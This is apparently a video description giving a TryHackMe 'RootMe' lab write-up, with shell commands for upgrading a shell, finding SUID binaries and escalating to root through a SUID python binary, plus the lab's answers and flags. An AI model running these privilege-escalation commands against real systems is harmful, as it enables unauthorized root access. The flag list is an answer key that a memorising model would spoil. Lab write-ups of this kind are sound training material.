TryHackMe CTF RootMe WriteUp

Опубликовано: 15 Май 2026
на канале: Pentest Checker

The codes:

python -c 'import pty; pty.spawn("/bin/bash")'
find / -type f -name user.txt
find / -type f -user root -perm -4000
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
find / -type f -name root.txt

They were changed because angled brackets aren't allowed in the description.

The awnsers:

TASK 2

Scan the machine, how many ports are open?
2
What version of Apache is running?
2.4.41
What service is running on port 22?
ssh
What is the hidden directory?
/panel/

TASK 3

user.txt :
THM{y0u_g0t_a_sh3ll}

TASK 4

Search for files with SUID permission, which file is weird?
/usr/bin/python
root.txt
THM{pr1v1l3g3_3sc4l4t10n}